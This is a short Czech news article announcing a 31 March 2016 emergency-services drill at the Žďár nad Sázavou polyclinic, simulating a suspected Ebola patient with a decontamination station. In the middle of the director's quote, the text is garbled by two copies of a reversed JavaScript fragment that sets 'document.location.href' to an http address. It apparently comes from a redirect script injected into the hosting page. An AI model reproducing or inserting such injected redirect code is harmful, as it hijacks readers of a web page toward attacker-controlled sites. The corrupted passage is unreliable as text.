Rainbow page separator

Záchranáři budou mít co do činění s pacientem trpícím ebolou

Pondělí, 28. března 2016

Poliklinika Žďár nad Sázavou

Žďár nad Sázavou / Taktické cvičení složek Integrovaného záchranného systému Kraje Vysočina se ve čtvrtek 31. března od půl třetí odpoledne uskuteční v objektu žďárské polikliniky. „Jde o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, abychom si navzájem ověřili taktické postupy při společném zásahu. Budeme prověřovat spojení a komunikační kanály mezi složkami integrovaného záchranného systému i samosprávou,“ vyjádřil se ředitel žďárské polikliniky Michal Hubert Zrůst.
Scénář počítá s příchodem pacienta, který pobýval v zahraničí, přičemž všechny příznaky naznačují, že by mohl trpět ebolou. Kromě pacienta jsou tak v ohrožení také lékař, tři další pacienti v čekárně a zdravotní sestra.
Veškeré dění v poliklinice bude podléhat směrnici pro jednotný postup při vzniku mimořádné události podléhající mezinárodním zdravotnickým předpisům v souvislosti s výskytem vysoce nakažlivé nemoci ve zdravotnickém zařízení.
Na zadním parkovišti polikliniky bude postaveno speciální dekontaminační stanoviště. Veřejnost bude moci cvičení složek integrovaného záchranného systému pozorovat z přilehlé travnaté plochy.